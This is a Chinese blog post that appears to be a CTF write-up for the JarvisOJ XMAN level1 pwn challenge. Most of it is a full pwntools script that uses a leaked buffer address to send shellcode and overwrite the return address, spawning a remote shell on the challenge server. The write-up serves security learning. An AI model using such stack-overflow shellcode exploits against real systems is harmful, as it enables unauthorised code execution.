[JarvisOj][XMAN]level1

都没开。。。

ida分析 发现返回了buf的地址

并没有自带system 或者/bin/sh

所以估计是自己写shellcode

偷个图。。。

复制代码
#!/usr/bin/env python

# -*- coding: utf-8 -*-



from pwn import *



shellcode = asm(shellcraft.sh())

io = remote('pwn2.jarvisoj.com', 9877)

text = io.recvline()[14: -2]

print text[14:-2]

buf_addr = int(text, 16)



payload = shellcode + '\x90' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)

io.send(payload)

io.interactive()

io.close()
复制代码

 

posted @   轩x  阅读(543)  评论(0编辑  收藏  举报
编辑推荐:
· Brainfly: 用 C# 类型系统构建 Brainfuck 编译器
· 智能桌面机器人:用.NET IoT库控制舵机并多方法播放表情
· Linux glibc自带哈希表的用例及性能测试
· 深入理解 Mybatis 分库分表执行原理
· 如何打造一个高并发系统?
阅读排行:
· DeepSeek 全面指南,95% 的人都不知道的9个技巧(建议收藏)
· 对比使用DeepSeek与文新一言,了解DeepSeek的关键技术论文
· Brainfly: 用 C# 类型系统构建 Brainfuck 编译器
· DeepSeekV3+Roo Code,智能编码好助手
· AI编程:如何编写提示词
点击右上角即可分享
微信分享提示